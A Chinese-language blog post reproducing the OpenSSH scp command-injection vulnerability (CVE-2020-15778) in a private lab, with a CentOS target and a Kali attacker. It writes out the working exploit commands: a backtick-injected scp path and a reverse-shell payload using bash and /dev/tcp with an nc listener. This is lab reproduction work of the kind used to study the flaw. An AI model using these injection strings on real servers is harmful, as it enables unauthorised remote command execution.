最近看好多大佬都在復現這個OpenSSH命令注入漏洞,作為菜雞的我也要跟隨大佬的腳步,也來復現一波(不分析漏洞原理,本人是菜雞,能力不足)。再寫這篇博客很不幸的我(電腦蹦了重啟,寫好的都沒保存),不放棄繼續重新來一遍。
介紹
2020年6月9日,研究人員Chinmay Pandya在Openssh中發現了一個漏洞,於7月18日公開。OpenSSH的8.3p1中的scp允許在scp.c遠程功能中注入命令,攻擊者可利用該漏洞執行任意命令。目前絕大多數linux系統受影響。深信服安全研究團隊依據漏洞重要性和影響力進行評估,作出漏洞通告。
漏洞影響版本
OpenSSH =< 8.3p1
漏洞復現要求
OpenSSH =< 8.3p1
需要知道ssh密碼
搭建環境
centOS 7 IP:192.168.110.153
kali2019.4 IP:192.168.110.134
介紹一下scp命令:
下面開始行動:
關閉防火牆,(我沒有關閉,在這里我也就不關閉了。)
查看ssh版本吧
ssh -V
首先嘗試一下利用scp命令,用kali對centOS進行寫文件,復制文件。
scp 1.txt root@192.168.110.153:'`touch /tmp/test.txt` /tmp'
成功將kali上面的文件傳入道centOS上面,和自己創建了文件。
直接進行nc反彈獲取shell
先監聽一個端口
nc -lvvp 7777
進行反彈shell
scp test.txt root@192.168.110.153:'`bash -i >& /dev/tcp/192.168.110.134/7777 0>&1`/tmp/test1.txt'
總結:該漏洞復現簡單,漏洞等級 嚴重。復現需要知道ssh密碼,主要針對知道ssh密碼卻不給登錄,這樣就可進行反彈shell獲取權限了。
改正:
我在總結說知道ssh密碼卻不給登錄,這個我今天復現嘗試了,禁止遠程登錄這個命令是不行的,應該是需要做別的策略,還在繼續探索中,主要修改一下自己錯誤的地方。
參考文章:OpenSSH 命令注入漏洞通告(CVE-2020-15778)